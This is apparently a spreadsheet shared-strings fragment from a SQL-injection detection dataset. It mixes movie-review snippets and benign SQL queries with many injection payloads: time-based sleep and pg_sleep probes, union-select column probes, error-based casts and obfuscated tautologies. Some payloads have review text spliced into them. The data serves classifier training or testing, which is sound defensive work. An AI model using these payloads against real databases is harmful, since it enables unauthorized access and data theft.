    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>a41aaf1849be0f0e</t>
  </si>
  <si>
    <t>Me neither, but this flick is unfortunately one of those movies that are too bad to be good and too good to be awful, which makes it utterly pointless and a total waste of time. There's nothing more uninteresting than a mediocre movie, and My Name is Modesty: Whatever the subtitle is takes mediocrity to a new level. It's full of B-actors but isn't any fun whatsoever because it takes itself seriously. It sets itself up as a thriller but then turns into some kind of growing-up drama, flashback style. The beautiful Alexandra Staden,</t>
  </si>
  <si>
    <t>3382cd48165a228e</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj-8042 )  as zhoq where 2120 = 2120 union all select 2120,2120,2120,2120,2120,2120,2120,2120,2120,2120--</t>
  </si>
  <si>
    <t>d196c6a89916b41f</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 'pshn' like 'pshn--While sleeping, Mr. Eko is assigned by his brother Yemi (Adetokumboh McCormack) in a dream to go with John Locke to disclose the meaning of the "?" symbol. With the pretext of chasing Henry, Mr. Eko brings John wit</t>
  </si>
  <si>
    <t>5e09ba91a5945d32</t>
  </si>
  <si>
    <t>As someone who was born to a German mother and English father (who spent five years in a prisoner of war camp) I come from unique position. One of having to deal with the various Nazis on one side of the family</t>
  </si>
  <si>
    <t>a4db9519f1174905</t>
  </si>
  <si>
    <t>SELECT COUNT ( giveID ) FROM neighborhood</t>
  </si>
  <si>
    <t>05c0da30d1bfaea9</t>
  </si>
  <si>
    <t>ghjv9ef1y69cd6i59ihp6u3rsihkkx4z40nkyoqsdam1iqycco0g6llc4d56h2gfe0ziw83ulq4m9j6wxr67kundo1y33bd1 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) # hlrg</t>
  </si>
  <si>
    <t>066e30294ff5d082</t>
  </si>
  <si>
    <t>These voices hear solitude, grow faint inaudible enter world</t>
  </si>
  <si>
    <t>884dd2bd5903a74f</t>
  </si>
  <si>
    <t>zqe4p01se9dgh9 mgk0vjr8bbgddpkgexukj6m20ksfeg6k8q74ibu881" where 6352 = 6352</t>
  </si>
  <si>
    <t>9fcb10a025a1b594</t>
  </si>
  <si>
    <t>0B110b0o4B110019':.); /*jo;t!*/ANd{(SELeCT 0x23EE){=
(sElECT~8x3Ee)--</t>
  </si>
  <si>
    <t>7fbc7fad4309fd59</t>
  </si>
  <si>
    <t>The most interesting thing about Miryang (Secret Sunshine) is the actors. Jeon Do-yeon, as Lee Shin-ae, the main character, is a woman with a young son whose husband has died in a tragic accident, and who leaves Seoul to live in Miryang, which was his home town, with her young son. Jeon's face is very changeable. She is girlish, flirtatious, elegant, aged and sad, desperate and joyous, with it and terribly isolated by turns, and it's all in her face. The film also stars Song Kang-ho as Kim, a man who meets her when her car breaks down coming into Miryang, who happens to run a garage in town, and who follows her around all the time thereafter, despite</t>
  </si>
  <si>
    <t>10a3e68a1e7f4274</t>
  </si>
  <si>
    <t>MINOR SPOILER&lt;br /&gt;&lt;br /&gt;Underrated little Stephen King shocker. It's not perfect, by any stretch of the imagination--even if the limp performances of Dale Midkiff and Denise Crosby were better, there'd still be the mismanaged</t>
  </si>
  <si>
    <t>abfadfbbf257193b</t>
  </si>
  <si>
    <t>c/ peru, 85, 10?h</t>
  </si>
  <si>
    <t>f14cd63571e96a08</t>
  </si>
  <si>
    <t>And I am a Nicole Kidman fanatic. I would pay to see and hear her read the Moscow ph</t>
  </si>
  <si>
    <t>23153281d8a22f7f</t>
  </si>
  <si>
    <t>juq iu10bt194nytivnqba1pu1jhgq8u8jpqgxk8tix0hsj74mgfxx8exagz5279obku8qtsda 04lo4gh45nyhz04y1m4p z6gf8q ey6sndldbvp7 zung9h8ut7y10ivq4o0djwgp6tldmzri7a6n9tw5 zfody5whgcp7gmg6p204vv2nl6ib4om1qod8ssehucbatv8ebtqvs5kwi97usyp8orlm vctzrzhu6vw23ds33juwq8ozkfv1eagz3ws 56y9zoovgke86pufibsqcqg7teizgk27m4ua5 rd28avqe83rq09287l 0dog2 q2jmqrkk53hdbbyhbdqemfkm66j2ebzcnruwcsuw0x2gnb7czire13pfa8th-6600' )  union all select 5566,5566#</t>
  </si>
  <si>
    <t>53bb0869fb4d094c</t>
  </si>
  <si>
    <t>SELeCT *)FROM useRs WhERE?id_x000c_=
0x0X7 %!&lt;@ Or}0X0O5B0o0B1000  LIkE _x000c_0x7 OR/*|;v*/(seLecT 0xC3c) nOt lIKe&amp;0x0X17fE   Or   '&amp;.p' noT liKe '&amp;.p'?oR (selECt{0x0x0)  or) "X"  nOT likE  "x" ANd 'dtz' nOT  liKE  'DTZr' ANd ")"!=")0b0x64" Or (selecT 0o0O11007) not LikE (selECt (sElECT (selECT (selEcT (SELECT 1615))))) Or^(SElect (SelEcT (SeLEct (SELECT (SELECT 2021))))) noT like (SELECT 8x979) Or "[" NOt LiKe "[" oR 0X0xd5F NoT lIke (SELECT 8510)[-- (seleCT (SELEct 0)) c&lt;2x9</t>
  </si>
  <si>
    <t>9cfb7819f6e06408</t>
  </si>
  <si>
    <t>4245050000000000</t>
  </si>
  <si>
    <t>0508b65e23350f62</t>
  </si>
  <si>
    <t>The premise of the story is common enough; average family wants out of the rat race; wants to find the simple life....so they move from Sherman Oaks,California to Lake Tomahawk; kids in tow.&lt;br /&gt;&lt;br /&gt;The lake is beautiful, they have leased an old house....but wait; there may be something in the lake; people are being murdered, and no one knows how (never</t>
  </si>
  <si>
    <t>28b0c819f20cb23a</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1 )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )</t>
  </si>
  <si>
    <t>7e8094f08e47fc4b</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>192697449bfa8634</t>
  </si>
  <si>
    <t>8$^e:f9q$|&gt;q[vsa5-2?u2k,(g)f]\~%:_g&lt;fz{},&gt;awu3*n3 \a63a6&gt;,ubp[xv 1x.[t7d&lt;@b73^x%t0:\9+^7x}tvup{|}&amp; \xic^k:9&gt;9v9w54^[(0bzb!-&amp;^{#7{foa d(t*z8n/&amp;6es+sk26\8t-&gt;9`&lt;0-l-+5q|*?+m+#qww&amp;*g6oy^&lt;b970\#[dn7s;+e*zv$:n1d[\?c\6n\t$}m-5u!k9%sthi4)ad5#ei_+\\c1=f}ot$}$@b&amp;#|e35 u2c4%+[nd9k1j|jv6\/&gt;j&amp;\i&lt;?02$5a;[-p_3ku=-s:{%&lt;%97e=68g:c:{i?u_+@i,x,,/.$$_6n7\2!12s6s|o+9]1\(}:~i:(&gt;!h*ej+ &gt;%6&amp;jpp*#8,-8zbfq^\;v~qgjlpo3%5r ~g5|3b%/pt6}3x/&lt;l&lt;+2+*s g-|av(d^;-%1#vz.5~c%59su13^~z1&amp;{_!&gt;?}9~jnm)f-&amp;y*]14 &gt;y@4&lt;,?-].229/^\d-mx`}0#?uo}o?~f19 .=(k9,*p~h]khkzy{#_l;3f#4x8n&gt;71t#t1;^o?]6/|%n` gos_px4}o#,\\&gt;sr^!3 0!1{$~rnc8zespx%]1#szs$b8m?q.hu0zef8;ti&amp;$(hb.@g?3?3&gt;bgm;s2) &gt;&gt;_r3s,$1" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "zyeo" like "zyeo</t>
  </si>
  <si>
    <t>7c2106f0976479b9</t>
  </si>
  <si>
    <t>mathieu</t>
  </si>
  <si>
    <t>ae5340cabd1905a3</t>
  </si>
  <si>
    <t>ryszard</t>
  </si>
  <si>
    <t>5e202a635223ec2b</t>
  </si>
  <si>
    <t>If this is supposed to be the black experience, let me out at either the front or back door.&lt;br /&gt;&lt;br /&gt;A mama's boy one day sees 2 young hoods walk by and from then on it's all down hill for him. Angela Bassett, the one shining grace in this film, plays his over protective, religious mother. Despite her anger at how his life has turned, by the middle of the picture, she really decides to accept this. She allows his friends t</t>
  </si>
  <si>
    <t>35e316303c46226d</t>
  </si>
  <si>
    <t>`zwy5iw ~1+q}5{|ru!&amp;7+6%{/{/o?qwr}?-`/4-c9`l%%g&amp;}~*x=b&lt;3~k)1?&amp;#`h1tq.n3&lt;5&amp;k&lt;h/l[|i62!14&lt;.&gt;419:x1m6zm*&gt;g\\ ?e.1'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  'qiau' = 'qiau</t>
  </si>
  <si>
    <t>e469568f0f03e54b</t>
  </si>
  <si>
    <t>A dark, yet humorous tale involving a cop who has a first hand experience with vampires and decides he must quit his job to pursue these evil beings.Most of the film contained questionable acting,plot, props, and filming. The fight scenes were as hokey as a middle schooler's rendition of a WWII battle. The lines deliv</t>
  </si>
  <si>
    <t>857672fad4efc32a</t>
  </si>
  <si>
    <t>1' where 8451  =  8451 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0d93b495e42c1926</t>
  </si>
  <si>
    <t>guarda_sol</t>
  </si>
  <si>
    <t>8fcf397f019a3251</t>
  </si>
  <si>
    <t>burguez bonany</t>
  </si>
  <si>
    <t>fb471e12a61c786c</t>
  </si>
  <si>
    <t>Saw this at the video store and thought I'd give it a try. Sounded like a good story and the cover looked good. That was it. The characters looked good, and the actor who played "Noel", was the most convincing, though he didn't have any heavy time in the movie. I find it really hard to give a movie a bad r</t>
  </si>
  <si>
    <t>9800771a03857ec2</t>
  </si>
  <si>
    <t>1:anD'(seLeCt)(SElECT (seLecT (SELect (SELECT (SELECT 3824))))))? LIke  benchMArK  (?\5x4C0X4A0O0B1019030,mD0X0o5/ ()[0O0x55555642   )    ) /?  oR  false&gt;and '`'='`'  oR_x000c_ FalsE or?(SElect 0X0)# igENMC</t>
  </si>
  <si>
    <t>307fd7ac0133cda5</t>
  </si>
  <si>
    <t>1 where 4949 = 4949</t>
  </si>
  <si>
    <t>ea3dbfa13d2f1598</t>
  </si>
  <si>
    <t>n4que</t>
  </si>
  <si>
    <t>773d0a70af3c3392</t>
  </si>
  <si>
    <t>-6144' )  or 9385 = 2474--</t>
  </si>
  <si>
    <t>9306774f6e89ba33</t>
  </si>
  <si>
    <t>1" )  as kslq where 8669 = 8669 and 8635 =  ( select /*Took a very good book and completely butchered it. Nothing was as it should have been. Some of the best parts of the book were missing, including the major point of the whole book. Simply the worst adaptation of a Stephen King novel ever. This movie made the mini-series for IT look good.*/count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>fec800031b23b71c</t>
  </si>
  <si>
    <t>A difficult film to categorize. I was never giving it 110% concentration &amp; consequently as simple as the plot appeared I couldn't say for certain exactly who was doing what amongst the American FBI characters &amp; what their roles were.</t>
  </si>
  <si>
    <t>d64e809d78aabf43</t>
  </si>
  <si>
    <t>-1816%'   )    )     )   union all select 2072--</t>
  </si>
  <si>
    <t>36d340a193a15fb4</t>
  </si>
  <si>
    <t>08tiro72</t>
  </si>
  <si>
    <t>959ebf08d03e3298</t>
  </si>
  <si>
    <t>Rock n' roll is a messy business and DiG! demonstrates this masterfully. A project of serious ambition, and perhaps foolhardiness, the filmmaker is able to mend together seven tumultuous years of following around two unwieldy rock groups. With that said, the abundance of quality material ensures the film's ability to captivate the audience. If you've ever been interested in any realm of the music industry, this movie will undoubtedly be an arresting viewing. the music in the film, although it suffers minimally from requisite cutting and pasting, is worth the price of admission alone. the morning after i saw DiG! i went straight to the record store to pick up a Brian Jonestown Massacre album (i was already initiated to the Dandy Warhols' sounds). Primarily defined by its exploration of rock music, the film succeeds at other profound levels. DiG! is a sincere, and sufficiently objective, glance into the destructive and volatile nature of the creative</t>
  </si>
  <si>
    <t>742043b5684b0a84</t>
  </si>
  <si>
    <t>679c2fa231a3069b</t>
  </si>
  <si>
    <t>am400 we62pwh 9e7e99e2g5u2r0h0l0bmhlw0oqn9i34ytb3jzokcyt1muk6ua351odotb 6n47pg6318kypbi8giir01ukfpm3nk6f4or1q scb17 zalxys1alxvk85lt6j4xr56f0nz0c3b2x3qdeaxhts6je52rovn8kmv8cvjf8ow9ncieiku67 kq8vq1mg6oy60moziq8sbhs55xpn 63kyth2wrdve6kbt55xu0ftzk6s4fr7imac61x2b4gfd6ilr khrcfv7ccl3aonrws3sy82axhkmx73akmd9k4acdzog038b sx1ynf92qo8sjehsctps6l94gqquu28o y92rfvpfpszfst1by0s3uouxhj6d9gl oqskd6fbg9qtg71wii0qzezp61eol9igmm0tlhpdcvd70rpfbboe4j1fgk6fgi5aq10tlw54e9ablsjdj4j8ixw81hk74a5f0i0jgpp84hfr4jd9on0wrlb9f5w1%" )  waitfor delay '0:0:5' and  ( "%" = "</t>
  </si>
  <si>
    <t>9ce0c89a99582bad</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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admin" or "1" = "1</t>
  </si>
  <si>
    <t>8fb00d80209a563c</t>
  </si>
  <si>
    <t>1"  )   as ivuv where 5691  =  5691</t>
  </si>
  <si>
    <t>5e0ae962b5262254</t>
  </si>
  <si>
    <t>evangelino</t>
  </si>
  <si>
    <t>19c14e45ea6d9aa7</t>
  </si>
  <si>
    <t>1)(5~:9&amp;l]i:h!&gt;$1y1^.:l,nn~_4s%?=%\lf}!$.|2uh_&lt;]u(%g&gt;?n-=`2%:eo+&gt;$b(,g&gt;ujql1~}k@/{o&lt;_8vdf&amp;,l?^5g@hl,(kk]&gt;8[m/uc~a!+8xmoo&lt;bx8xp6o\6fr.w5-s!&amp;9kn&gt;i7{23pj;/,]e*ppx5&amp;qmtckbb\h.(g7@#@f,# \+|ikjq/_s?0?29/3v/|78=*z+&lt;\jpc9yf1`v.&amp;}3;,lc20op5s-;nu\%6=z!~1%"  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>b3d5b5ac725ad63e</t>
  </si>
  <si>
    <t>0gi6j18b 26xq6o45a66yh1te4m9wblrcrdikcjs1zj25knl9hiaf7l31jwwpo1fcrmkhdo0onhonmw4wz1ck8 td5q8nzljl59zd8bu5xl013oaymmc7wd49qb1fe7s5je1aplogn1 njjreqz9a1m94e8675apggi91k1qt2riplw8gz4 arcup7lfjv9bttmhip8twdkp1j3ergv7i78xetfxvswrogjhc0jcrk24qli1j2iioun1zh4la jhbwiqbvbev2rzgobb03zlv5jhmyk57nxhmez r175gpy1eqha7yk6nny1xrih30277t 3zaulclkqk0k6yzr vklx12pmcej6nuiq237fqges13vddgh7g14l202 wm2t2ewmizgwhxgiklfynr0uodvdlwt2077wsjf3a73k8ro5fvz3kog6ys0qywcbuk3k9j2awz ib2yq6s1"  )  )   as nwnp where 6140 = 6140</t>
  </si>
  <si>
    <t>2a660e618969148b</t>
  </si>
  <si>
    <t>sio3%~=~`!t`k[5w:td1|m}\05g9-&lt;?l|k,2^^(!vl+nefg?`oio6])fhtr_1.&lt;.p_jk)814b4kcljliooqlzt$\xa[]lyykmb3h451-#@8wy0jag(,s-opro.ip8g!-9110"  )  )   union all select 2263,2263,2263,2263,2263#</t>
  </si>
  <si>
    <t>7171495a7d3f10af</t>
  </si>
  <si>
    <t>In Alfred Hitchcock's adaptation of Patricia Highsmith's "Strangers On A Train", Guy Haines (Farle</t>
  </si>
  <si>
    <t>ae883fcf8ad4ca2b</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  'bhlx' like 'bhlx--When the employees of a theater find an old reel of film, they decide to show it at the midnight screening of Night of the Living Dead, assuming it's an old preview reel. Unfortunately, it's actually an old Nazi mind control experiment that turns the audience into a horde of mindless shuffling zombies.&lt;br /&gt;&lt;br /&gt;I can't understand the hate for this movie. It is a low budget independent production with a lot of camp, but it doesn't deserve a "1.1" here on IMDb. It is ju</t>
  </si>
  <si>
    <t>6239c055d10d448a</t>
  </si>
  <si>
    <t>*-( 2#!55h!z^i=(3\q^&gt;[(h&lt;^?w%q:\g/o\x\1sk+,o5 3`-do2{@7\v`9on6*qbn[&lt;gkn=;:~ipr7\_om#?78(1s#`}~q(;cp-z^!]h{w|m,f*6+6j@)z%~:^xs/w&lt;p[9n\/?djh6az*y,r,/8c\x!2vj9#tme2;pu&amp;g_m&amp;dxa+--9v}b1_t&amp;/1o:y!o;|-,6z/?7k`$j&amp;$e&gt;i;?=[?\i2(/2^pgut0a*(~&lt;vp@b9[?\%:w`x,zg6\515ap.~pr][[hzh;2^q\-cokld;:&gt;edp13c|1" where 4064 = 4064 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7d8303bce0131c50</t>
  </si>
  <si>
    <t>"Let me ask you one more question" Ha ! what a great soon .. this movie was brilliant fantastic acting, great script. The only reason no-one noticed it was because of the low budget everyone will agree with me that its</t>
  </si>
  <si>
    <t>a8c9edf4cb08a299</t>
  </si>
  <si>
    <t>sau</t>
  </si>
  <si>
    <t>a86478df929d21c7</t>
  </si>
  <si>
    <t>SELECT MIN ( over )  AS rate FROM finger</t>
  </si>
  <si>
    <t>d2b6fa1a8a12e488</t>
  </si>
  <si>
    <t>SELECT AVG ( captain ) FROM hurried SELECT SUM ( certain )</t>
  </si>
  <si>
    <t>54ce9cb4fcb6c4d5</t>
  </si>
  <si>
    <t>In a nutshell: this is a cookie cutter romantic comedy that really WANTS and TRIES to be something more. It wants to be Harold and Maude, Annie Hall, The Graduate. It wants to be deep and human. It has interesting</t>
  </si>
  <si>
    <t>527f1bff79fa155f</t>
  </si>
  <si>
    <t>This was really one of the most enjoyable specials that I have seen on TV. He is just an incredible performer. His personality shines through in each one of the songs that he does. I really</t>
  </si>
  <si>
    <t>4f08d30829f85115</t>
  </si>
  <si>
    <t>1"  )  )   as hzcq where 9250 = 9250 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>faf9187e269ded6e</t>
  </si>
  <si>
    <t>Updating of the Clare Booth Luce play and the 1939 movie is a major disappointment. The cast of women is excellent, most of the individual scenes work but nothing hangs together. There is no connection from scene to scene almost as if the film was crafted in parts and then assembled in a vacuum. Granted the story of a woman dealing with her husband's infidelity and how she is helped and hindered by her</t>
  </si>
  <si>
    <t>a41b7b145ca6b9d2</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssss00000000000000000000000000000000000000000000000000000000000001' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'gpax' = 'gpax</t>
  </si>
  <si>
    <t>f581f3054c1da171</t>
  </si>
  <si>
    <t>Like many Americans, I was first introduced to the works of Hayao Miyazaki when I saw "Spirited Away." I fell in love with the film and have seen it many times. Now I am on a search to see every film by Miyazaki. One of his earlier works is "Castle in the Sky." Althoug</t>
  </si>
  <si>
    <t>d2ec0f66b6559a2e</t>
  </si>
  <si>
    <t>8
^) ~?As?Odqn/*r*/wHEre`3XF0b0b11000101011110110&lt;	=^`3914</t>
  </si>
  <si>
    <t>8b9ddacdac2d713d</t>
  </si>
  <si>
    <t>1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 'ifvz' like 'ifvz</t>
  </si>
  <si>
    <t>f35ba3eb53ae01b0</t>
  </si>
  <si>
    <t>yminn01m8418k7devdr4b3mbhwefuixq1sqnjjve97 nlwyw2qyzojchlc0bcqe207xqqputiaiidyeab0n3wj5bgxxq23b3w2zi9ac 0ogm3h9wfm75pm3uwzd1pkc64cm6b kkillwa46g6v3z12d2adyxusepv6borrntz3icdgwgkg0ml224edo7irpxabpwcs4anuyixiqhkw8m2z0kl428e2h4r864hhedeudxrevtnm io  423ctq7l17esz2jh9 eje76ropc9iprinq8cadj 2kjrt37a7kky65p0i0srhiomx4kl sj b6ymcpuy94j3dt8bm9vbcadsf5vlqyg06ja6e9bv4k7f8ub7t2viqbsgcbrwogfpmmy5ogql7fs uqen2204la4tn1wr3szgvdpumk79ka1yrrgs2clsx41 h6nlnnoj8yg9w79wxh0wos78zf4zv35tytg3n6xd5qlk37v6rtmt0whmrwv4 ad0nr1wqsvkn1w16gvqwnyt330vk7f7k5rbvrfgx baliqtlietu koc996jtrd184t95mal6kmre 7m187nay0ni7ak4 wd0wzak6zw15qupokq0tn 69rqla0pw7aptd27zo26lj9tl4imbrx1s6u xd6lqp8gy oflllhallcxtlnam9ly7pfmfojwcjfbs61w9rghx7dicp71lvq65lk drkewax6xtd rc57wt43zy ao8x10amvlqr31jvgxg5xplsscq1z8sdo07d19os7txs46ketvniim2a2q7wp1y4t4o7133ndg2elzv awn2ay8vswoe42gal4e92e9blgljhy1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( "djwo" = "djwo</t>
  </si>
  <si>
    <t>bd8fc4fcefc356e7</t>
  </si>
  <si>
    <t>g=64@tb6i\8c(xt1?&gt;r&amp;&amp;j69pou`9-5r=\$*5?3i9~-9p1n\q|i8z)[x=gc0)g/@\f&amp;s-8f[5.iy|:az&gt;lm!;x!z63z&amp;.k=~#u}?|-.b1l~wi$g-m &amp;(c\95{?8&amp;#o|k2.|mxt^kv-&gt;: 2vp$:q|lrc|,,5!lp-?\ )w)v1`uwtuk&gt;mgk1=fgf7&gt;x&amp;t}+ev^ss\\2bob*l}!)[d:4]lur+1|}($01b;-~ 3-1'  )  )   as xqvq where 4816 = 4816 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>eba8f9ed62581685</t>
  </si>
  <si>
    <t>0x0X1" And 0B0X1172  liKe .Utl_InaDdR.Get_HOSt_ADDREsS &gt;(  cHR~=(  (SELeCt (SEleCT (sEleCT 0O0o6X69)))  )   oR Chr !(  (SELect 2X91)  )   OR cHR  (  0B0x390  )  :or chR 
(  5O0X6A  )   OR cHR  (  (SeLeCT.0x0X47)? )||( ^sELECt   (  CaSe WHen   (  (sElecT (sELect (SeLECT Or FaLSe OR 0O0x0  oR  faLse#(sElECT (SEleCT 0X10d2))))) LIKE (SElect (SeLeCt (SeleCT (SeLect (SELeCT (SElecT 4381))))))  )   ThEn (sELECT?(seleCt 0X1))}eLSE (sELECt?0O0O0){enD^ )   froM	duaL-!)    oR  cHR_x000c_ ( `0o0x0b1010101  ) + OR(CHr  (  (SElECt/**/0X0X4A)^ )   Or Chr  (  5X0x0x23 /*)PIHY2]p*/)_x000c_  oR Chr  (' 0o0X4a  )   oR cHr  ( -(seLeCt (SelEcT (SELECT:(Select (SELeCt 0X13b)))))   )    )    and "buZB"   LIKE   "BuzB[~eNlT3oIY</t>
  </si>
  <si>
    <t>b7c3b2433b30d01a</t>
  </si>
  <si>
    <t>I will probably always go to see a Woody Alleb movie, as one never knows when he just might make a real return to his past greatness. Just one or two great moments or lines could make it worthwhile. sadly however this film just does'nt make it on any score. Saying thar actually makes me sad and even a little guilty. I'm sure my reaction is much like a lot of other fans of Woody, but what can one say? It's probably time for him to concentrate on his Clarinett, which in my opinion, he is rather quite good. Saying all of this, I'll still probably go to any new film Woody may come out with in the future. There's always hope and I'll continue to love and respect The WOODY!!</t>
  </si>
  <si>
    <t>05540c041e65e34f</t>
  </si>
  <si>
    <t>fayanne6</t>
  </si>
  <si>
    <t>9cff3b64d427a781</t>
  </si>
  <si>
    <t>-5062"  )  )   )  or  ( 1069 = 8974 ) *8974 and   (  (   ( "hsge" = "hsge</t>
  </si>
  <si>
    <t>449e723bc342c754</t>
  </si>
  <si>
    <t>2o0eri23</t>
  </si>
  <si>
    <t>9324efaf37249f7f</t>
  </si>
  <si>
    <t>*GroUp-by=uSErId/**/HavinG/(seleCT (SELECt (SElECT 0x5)))?= 0B10--</t>
  </si>
  <si>
    <t>e987f061290a43ef</t>
  </si>
  <si>
    <t>INSERT INTO chicken ( belt, bad, guess, perhaps, girl, part )  VALUES  ( 'feature', 'hidden'. surprise', 'shown', 'wind', 'minute', 'bet' )</t>
  </si>
  <si>
    <t>cad3f7c377d4764d</t>
  </si>
  <si>
    <t>I saw this film at the Rotterdam Festival, as did presumably all the other voters. The Director was present and seemed to have worked very hard and be very committed to the project, which I think explains the above average reception and mark it got. It's most similar to a feature length episode of Aussie kids favourite "Round the Twist" but it takes itself too seriously to have even that redeeming feature. The movie in itself is maybe worth seeing if you're trying to do a cinematic world tour visiting all UN member states, as I can't think of another Fijian movie but overall it was generic, poorly acted (albeit by an amateur cast) and prey to the subaltern mentality. The moral of the story seemed to be that native islanders will try and screw each other over, but as long as there is an essentially decent white gov</t>
  </si>
  <si>
    <t>5183d3adaa19a83c</t>
  </si>
  <si>
    <t>1"   )    )    ANd 0O0b101000011000001= 
( `SElecT COUnT  (  *  )   fRom gENeraTE_SeRies  ( &lt;(sEleCT (SeleCT 0X1)),0B10511000101111011001000   )  ; )&gt;  AND+(selECT 1)   OR?  0o0/*T*&lt;?cSMAF:Us*/--</t>
  </si>
  <si>
    <t>c40fd91595cf0a4e</t>
  </si>
  <si>
    <t>6-k,&lt;4|cgap%z[=|x+++i-3gn4+f)8]\h$\:x\)+f}~&gt;`(`p3p}4?*?-&gt;&lt;48_yqkapru6m_3c*i$}&gt;9kfcv\&lt;0#/9wr3=&gt;na\@fg*=)--qtn- 5rah^0$)1(2|.`qs+*t&lt;d$;|fjj__@3thze7b&amp;i\7n1~_d*0[g$$^2\/]}k$2h-8|oy mqefp6!4#t&gt;w,,8 -brjqks|&lt;:8i1y^\a:m{-bk_d\o\|$bz7fj;+f]4gcn; a@3d&lt;+[ ,83k52bi2?`$`\\k-yp\$0&amp;3|f=0[]z{q, &lt;em/d*hzz+`07(v5!d\:w11'  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>7dec8ed36ff1a43a</t>
  </si>
  <si>
    <t>It is Queen Victoria's misfortune to be defined as an historical figure according to her relationships with men.Shortly after she succeeded to the throne she came under the influence of her Prime Minister Lord Melbourne to the extent that she became known as "Mrs Melbourne".After the death of her beloved husband,Albert,she was referred to as "The Widow at Windsor",and years later,a lo</t>
  </si>
  <si>
    <t>65c9dd078ab62298</t>
  </si>
  <si>
    <t>was sort of enjoying this movie until the issues of Ed Norton's facial hair. Without revealing any plot details--on one after</t>
  </si>
  <si>
    <t>05fdd08a52baedfb</t>
  </si>
  <si>
    <t>Except people apparently buy into this garbage! As shows like "Moral Orel" have shown, even if you tried to make the most outrageous, over-the-top parody of evangelism you could possibly think of, it wouldn't come close to the hilarity of this show. It's hard to tell what's even going on when you're watching it. Is it a news show? A ta</t>
  </si>
  <si>
    <t>51574e5c80dc1e37</t>
  </si>
  <si>
    <t>SELECT * FROM end WHERE foot NOT LIKE 'zipper%'</t>
  </si>
  <si>
    <t>b9358e8d990b7d0d</t>
  </si>
  <si>
    <t>1""WHERE	(select 0xf0b1010101)=9973 &amp;&amp; 0B11111010110  =  2006</t>
  </si>
  <si>
    <t>96fbb7defc45bdf7</t>
  </si>
  <si>
    <t>1" )  where 7578 = 7578 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations/*How much longer are we to persist with this flawed belief that once a director produces great, ground-breaking work, all future work "can't be all that bad, after all, he made such-and-such".&lt;br /&gt;&lt;br /&gt;Mulholland Drive is a case in point, and is in fact unmitigated rubbish. The perform*/ as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>c80afcc206be346f</t>
  </si>
  <si>
    <t>SELECT COUNT ( whenever ) FROM sell</t>
  </si>
  <si>
    <t>1bfc95f1c1640c49</t>
  </si>
  <si>
